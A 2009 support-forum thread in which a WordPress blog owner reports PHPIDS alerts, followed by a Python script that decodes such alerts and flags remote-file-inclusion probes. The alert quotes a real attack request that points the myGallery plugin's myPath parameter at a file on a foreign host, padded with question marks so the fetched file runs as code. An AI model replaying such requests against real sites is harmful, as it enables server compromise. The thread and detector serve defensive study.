    imendes (Aug 31st 2009)

    I have a gallery component in my blog. I think every time someone visits that gallery I receive an email like this:

    Affected tags: xss csrf id rfe lfi
    Affected parameters: REQUEST.m=200902%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F, GET.m=200902%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F,
    Request URI: %2F%3Fm%3D200902%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F
    .mario (Aug 31st 2009)

    Hi!

    This is one piece of the parameter we have here:

    200902//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg

    I think it would be best to exclude this parameter from detection, although it looks pretty inviting for attacks. Is there any way to make the plugin not send out those huge params?
    imendes (Sep 2nd 2009)

    Now that you mention it, I think that is a real attack. The URL http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg is not mine. Someone is using the plugin to do something. Maybe it is a flaw in the plugin. My version is old. I'm going to update the plugin and see if the problem continues.

    I will inform you as I have new information.

    Thank you.
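The two things the thread does by hand, decoding the URL-encoded value PHPIDS reported and noticing that the embedded `myPath` URL points at a host that is not the blog's own, can be automated. The script below is an added example written for this page; it is not part of PHPIDS or the myGallery plugin. It parses the "Affected parameters" line of an alert in the format quoted above, looks for a second PHP request smuggled inside a single parameter value, and flags any inner parameter whose value is an absolute URL on a foreign host. The sample alert line is copied from the first post; the set of "own" hostnames (`blog.example`) is an assumption you would replace with your site's real hostnames.

```python
import re
import urllib.parse

# Constructed sample input: the "Affected parameters" line of the PHPIDS alert
# quoted in the thread. Only the REQUEST.m entry is kept (GET.m was identical).
ALERT_LINE = (
    "Affected parameters: REQUEST.m=200902%2F%2Fwp-content%2Fplugins%2Fmygallery"
    "%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it"
    "%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F"
)

# Assumption: the hostnames the blog itself is served from. Any other host is "remote".
SITE_HOSTS = {"blog.example"}

# Absolute http(s) URLs anywhere inside a decoded value.
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# "<anything>.php?<query>" embedded inside a parameter value, i.e. a nested request.
NESTED_RE = re.compile(r"([^\s?]+\.php)\?(\S*)", re.IGNORECASE)


def parse_affected(line):
    """Turn 'Affected parameters: SRC.name=urlencoded, ...' into
    {(source, name): decoded_value}, undoing the one level of URL encoding
    that the alert applies to each value."""
    _, _, body = line.partition(":")
    params = {}
    for item in body.split(","):
        item = item.strip()
        if "=" not in item:
            continue
        key, _, encoded = item.partition("=")
        source, _, name = key.partition(".")
        params[(source, name)] = urllib.parse.unquote(encoded)
    return params


def nested_requests(value):
    """Yield (script_path, inner_params) for each PHP request hidden inside one
    parameter value. The inner query string is parsed with parse_qsl, so '?'
    characters inside the inner values (the trailing '???' here) are preserved."""
    for match in NESTED_RE.finditer(value):
        script, query = match.group(1), match.group(2)
        inner = dict(urllib.parse.parse_qsl(query, keep_blank_values=True))
        yield script, inner


def remote_hosts(value, site_hosts):
    """Hostnames of absolute http(s) URLs in value that are not our own."""
    hosts = []
    for url in URL_RE.findall(value):
        host = urllib.parse.urlsplit(url).hostname
        if host and host.lower() not in site_hosts:
            hosts.append(host.lower())
    return hosts


def classify(alert_line, site_hosts=SITE_HOSTS):
    """One finding per (parameter, nested script, inner parameter, remote host).

    A path into a .php file carrying a parameter whose value is a URL on a host
    we do not control is the shape of a remote-file-inclusion probe, which is
    why PHPIDS tagged the request 'rfe'. 'padded' records whether the inner
    value ends in '?', a common way to turn anything the script appends into a
    harmless query string on the remote fetch."""
    findings = []
    for (source, name), value in parse_affected(alert_line).items():
        for script, inner in nested_requests(value):
            for inner_name, inner_value in inner.items():
                for host in remote_hosts(inner_value, site_hosts):
                    findings.append({
                        "param": f"{source}.{name}",
                        "script": script,
                        "inner_param": inner_name,
                        "remote_host": host,
                        "padded": inner_value.endswith("?"),
                    })
    return findings


if __name__ == "__main__":
    for finding in classify(ALERT_LINE):
        print(finding)
```

If the embedded host were one of your own, `classify` returns nothing and excluding the parameter from detection, as suggested above, would be reasonable; a foreign host is the case where the alert should stay enabled and the plugin version should be checked.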